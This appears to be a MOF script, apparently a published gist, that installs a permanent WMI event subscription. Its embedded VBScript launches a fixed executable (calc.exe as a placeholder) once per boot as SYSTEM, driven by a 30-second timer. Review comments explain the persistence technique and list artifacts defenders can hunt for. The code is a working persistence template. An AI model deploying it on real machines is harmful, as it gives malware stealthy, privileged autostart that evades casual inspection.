VBScript-based WMI ActiveScriptEventConsumer (a permanent event subscription in root\subscription, compiled with mofcomp) that launches a fixed executable once per boot; the gist describes the payload as running as SYSTEM.
/*
Author: Kyle Hanslovan
Contact: @KyleHanslovan
License: MIT
Date: 07/18/2014
*/
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
/*
 * Permanent WMI event consumer living in root\subscription. Every time the
 * bound __EventFilter fires, the WMI script host runs the embedded VBScript,
 * which launches strPayloadPath at most once per boot. "Already ran since
 * boot" is tracked with a WMI class (CIM_Marker in root\CIMV2) rather than a
 * file or registry value:
 *   - MarkerExists / GetMarkerTime: scan the subclasses of root\CIMV2 for a
 *     path containing ":CIM_Marker" / "CIM_Marker" and read its LastRunTime.
 *     (GetMarkerTime drops the leading ":" that MarkerExists uses; harmless
 *     for this class name, but the two checks should really be identical.)
 *   - GetBootTime / GetCurrentTime: Win32_OperatingSystem.LastBootUpTime and
 *     .LocalDateTime, taken from the first instance only.
 *   - RunSinceBoot: True unless LastBootUpTime > LastRunTime. Both values are
 *     CIM datetime values compared as strings; that is only sound while both
 *     carry the same fixed-width format and UTC offset — confirm across a
 *     DST change.
 *   - ExecutePayload: if the file exists (Scripting.FileSystemObject), start
 *     it with WScript.Shell.Run and return True; otherwise return False, so
 *     the marker is never written and the script keeps retrying on every
 *     timer event.
 *   - SetMarker: create/overwrite the CIM_Marker class with a datetime
 *     property LastRunTime set to the current local time (Put_ with the
 *     default flags).
 *   - Main: run the payload (and set the marker on success) when no marker
 *     exists or the marker predates the last boot.
 *
 * NOTE(review): this is the classic WMI event-subscription persistence
 * technique. ActiveScriptEventConsumer scripts run in the WMI script host
 * (not in the logged-on user's session), which is why the gist describes
 * the payload as running as SYSTEM; a GUI program such as calc.exe started
 * this way is presumably not visible on the interactive desktop — verify on
 * the target OS. For defenders, the artifacts are the __EventFilter,
 * ActiveScriptEventConsumer and __FilterToConsumerBinding in
 * root\subscription plus the non-standard CIM_Marker class in root\CIMV2;
 * enumerating root\subscription (Get-WmiObject/Get-CimInstance) and, where
 * Sysmon is deployed, its WMI event IDs 19-21 are the usual ways to spot it.
 */
instance of ActiveScriptEventConsumer as $Consumer
{
// The script engine that hosts ScriptText; "JScript" is the other option.
ScriptingEngine = "VBScript";
// Adjacent string literals are concatenated by mofcomp into one script.
// strPayloadPath below is the executable launched once per boot; the
// backslashes are doubled twice (once for MOF, once for VBScript).
ScriptText = ""
"Const strComputer = \".\"\n"
"Const strMarkerClassName = \"CIM_Marker\"\n"
"Const strPayloadPath = \"C:\\\\Windows\\\\system32\\\\calc.exe\"\n"
"Const strWin32OSClassName = \"Win32_OperatingSystem\"\n"
"Set objWMI = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\Root\\CIMV2\")\n"
"Main()\n"
"Sub SetMarker()\n"
" Set objMarker = objWMI.Get()\n"
" objMarker.Path_.Class = strMarkerClassName\n"
" Const wbemCimTypeDatetime = 101\n"
" Call objMarker.Properties_.Add(\"LastRunTime\", wbemCimtypeDatetime)\n"
" objMarker.LastRunTime = GetCurrentTime()\n"
" objMarker.Put_()\n"
"End Sub\n"
"Function ExecutePayload()\n"
" ExecutePayload = False\n"
" Set objFSO = CreateObject(\"Scripting.FileSystemObject\")\n"
" If objFSO.FileExists(strPayloadPath) Then\n"
" Set objShell = CreateObject(\"WScript.Shell\")\n"
" objShell.Run(strPayloadPath)\n"
" ExecutePayload = True\n"
" End If\n"
"End Function\n"
"Function GetBootTime()\n"
" Set GetBootTime = Nothing\n"
" Set colOS = objWMI.InstancesOf(strWin32OSClassName)\n"
" For Each objOS in colOS\n"
" GetBootTime = objOS.LastBootUpTime\n"
" Exit For\n"
" Next\n"
"End Function\n"
"Function GetCurrentTime()\n"
" Set GetCurrentTime = Nothing\n"
" Set colOS = objWMI.InstancesOf(strWin32OSClassName)\n"
" For Each objOS in colOS\n"
" GetCurrentTime = objOS.LocalDateTime\n"
" Exit For\n"
" Next\n"
"End Function\n"
"Function GetMarkerTime()\n"
" Set GetMarkerTime = Nothing\n"
" Set colClasses = objWMI.SubclassesOf()\n"
" For Each objClass in colClasses\n"
" if InStr(objClass.Path_.Path, strMarkerClassName) Then\n"
" GetMarkerTime = objClass.LastRunTime\n"
" Exit For\n"
" End if\n"
" Next\n"
"End Function\n"
"Function MarkerExists()\n"
" MarkerExists = False\n"
" Set colClasses = objWMI.SubclassesOf()\n"
" For Each objClass in colClasses\n"
" if InStr(objClass.Path_.Path, \":\" & strMarkerClassName) Then\n"
" MarkerExists = True\n"
" Exit For\n"
" End if\n"
" Next\n"
"End Function\n"
"Function RunSinceBoot()\n"
" RunSinceBoot = True\n"
" If GetBootTime() > GetMarkerTime() Then\n"
" RunSinceBoot = False\n"
" End If\n"
"End Function\n"
"Sub Main()\n"
" If MarkerExists() Then\n"
" If Not RunSinceBoot() Then\n"
" bSuccess = ExecutePayload()\n"
" If bSuccess Then\n"
" Call SetMarker()\n"
" End If\n"
" End If\n"
" Else\n"
" bSuccess = ExecutePayload()\n"
" If bSuccess Then\n"
" Call SetMarker()\n"
" End If\n"
" End If\n"
"End Sub\n";
};
/*
 * Timer that drives the subscription: WMI raises a __TimerEvent with
 * TimerId "EventTimer" every IntervalBetweenEvents milliseconds (30 s here),
 * so the consumer's script is polled continuously; the once-per-boot
 * behaviour comes entirely from the CIM_Marker check inside the script.
 * SkipIfPassed = FALSE is the setting that does not discard timer events
 * whose interval elapsed while WMI was not running — confirm against the
 * __IntervalTimerInstruction documentation for the target OS.
 */
instance of __IntervalTimerInstruction
{
// Must match the TimerId used in the __EventFilter query below.
TimerId = "EventTimer";
SkipIfPassed = FALSE;
// Polling interval in milliseconds.
IntervalBetweenEvents = 30000;
};
/*
 * Event filter selecting every __TimerEvent whose TimerId is "EventTimer",
 * i.e. each tick of the timer instruction above. EventNamespace is the
 * namespace the query is evaluated in; it must be the one holding the timer
 * instruction (root\subscription, set by the #PRAGMA NAMESPACE at the top).
 * NOTE(review): __EventFilter instances in root\subscription are the first
 * thing to enumerate when hunting for this kind of persistence.
 */
instance of __EventFilter as $Filter
{
Query = "SELECT * FROM __TimerEvent WHERE TimerId = \"EventTimer\"";
QueryLanguage = "WQL";
EventNamespace = "root\\subscription";
};
/*
 * Links the filter to the consumer. Filter and consumer are inert on their
 * own; this binding is what makes WMI run the script on each matching event,
 * so removing the binding alone is enough to disarm the subscription (the
 * consumer, filter and CIM_Marker class would then remain as leftover
 * artifacts — clean those up as well).
 */
instance of __FilterToConsumerBinding as $Binding
{
Filter = $Filter;
Consumer = $Consumer;
};